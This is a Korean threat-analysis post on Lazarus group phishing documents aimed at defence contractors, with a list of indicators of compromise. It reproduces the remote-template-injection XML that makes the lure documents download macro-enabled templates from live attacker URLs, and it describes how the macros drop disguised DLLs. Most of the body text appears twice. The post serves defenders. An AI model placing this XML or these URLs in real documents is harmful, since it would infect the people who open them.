Lazarus 그룹의 방위산업체 대상 공격 증가
Contents
Lazarus 그룹의 방위산업체 대상 공격이 지난달부터 증가하고 있다. 공격은 Microsoft Office Word 프로그램의 Office Open XML 타입의 워드 문서 파일을 이용하였다. (샘플 출처: 해외 트위터)
- Senior_Design_Engineer.docx – 영국 BAE 시스템즈 (5월 접수)
- Boeing_DSS_SE.docx – 미국 Boeing (5월 접수)
- US-ROK Relations and Diplomatic Security.docx – 국내 ROK (4월 접수)
문서 파일은 공통으로 외부 External 주소에 접속하여 추가 문서 파일(*.dotm, Word Macro-Enabled Template)을 다운받는다. 다운된 추가 문서 파일은 특정 패턴의 VBA 매크로 코드로 악성 DLL 파일을 시스템에 생성 및 동작한다.
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?> <Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”https://www.astedams.it/uploads/frame/61.dotm” TargetMode=”External”/></Relationships>
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?> <Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”https://www.astedams.it/uploads/template/17.dotm” TargetMode=”External”/></Relationships>
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?>
<Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”
https://od.lk/d/MzBfMjA1Njc0ODdf/pubmaterial.dotm
” TargetMode=”External”/></Relationships>
VBA 코드는 AutoOpen() 함수를 이용한다. 실행 시 최초 실행한 문서 파일을 삭제하고 ‘<파일명> .doc’ 이름으로 정상 문서 파일을 시스템에 만들어 사용자에게 보여줌과 동시에 악성 DLL 파일을 x64/x86를 구분하여 시스템에 생성, 실행한다. 생성에 필요한 바이너리 데이터는 UserForm에 Base64로 인코딩되어 있다. DLL 파일의 경로는 Microsoft 경로를 위장한다.
- %UserProfile%AppDataLocalMicrosoftNoticewswsdts.db
- %UserProfile%AppDataLocalMicrosoftNoticewswsuer.db
- %UserProfile%AppDataLocalMicrosoftOneNoteonenote.db
아래는 …
- Senior_Design_Engineer.docx – 영국 BAE 시스템즈 (5월 접수)
- Boeing_DSS_SE.docx – 미국 Boeing (5월 접수)
- US-ROK Relations and Diplomatic Security.docx – 국내 ROK (4월 접수)
문서 파일은 공통으로 외부 External 주소에 접속하여 추가 문서 파일(*.dotm, Word Macro-Enabled Template)을 다운받는다. 다운된 추가 문서 파일은 특정 패턴의 VBA 매크로 코드로 악성 DLL 파일을 시스템에 생성 및 동작한다.
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?> <Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”https://www.astedams.it/uploads/frame/61.dotm” TargetMode=”External”/></Relationships>
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?> <Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”https://www.astedams.it/uploads/template/17.dotm” TargetMode=”External”/></Relationships>
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?>
<Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”
https://od.lk/d/MzBfMjA1Njc0ODdf/pubmaterial.dotm
” TargetMode=”External”/></Relationships>
VBA 코드는 AutoOpen() 함수를 이용한다. 실행 시 최초 실행한 문서 파일을 삭제하고 ‘<파일명> .doc’ 이름으로 정상 문서 파일을 시스템에 만들어 사용자에게 보여줌과 동시에 악성 DLL 파일을 x64/x86를 구분하여 시스템에 생성, 실행한다. 생성에 필요한 바이너리 데이터는 UserForm에 Base64로 인코딩되어 있다. DLL 파일의 경로는 Microsoft 경로를 위장한다.
- %UserProfile%AppDataLocalMicrosoftNoticewswsdts.db
- %UserProfile%AppDataLocalMicrosoftNoticewswsuer.db
- %UserProfile%AppDataLocalMicrosoftOneNoteonenote.db
아래는 …
IoC
http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
http://schemas.openxmlformats.org/package/2006/relationships
http://www.astedams.it/newsl/offerte-news.asp
https://od.lk/d/MzBfMjA1Njc0ODdf/pubmaterial.dotm
https://www.astedams.it/uploads/frame/61.dotm
https://www.astedams.it/uploads/template/17.dotm
http://schemas.openxmlformats.org/package/2006/relationships
http://www.astedams.it/newsl/offerte-news.asp
https://od.lk/d/MzBfMjA1Njc0ODdf/pubmaterial.dotm
https://www.astedams.it/uploads/frame/61.dotm
https://www.astedams.it/uploads/template/17.dotm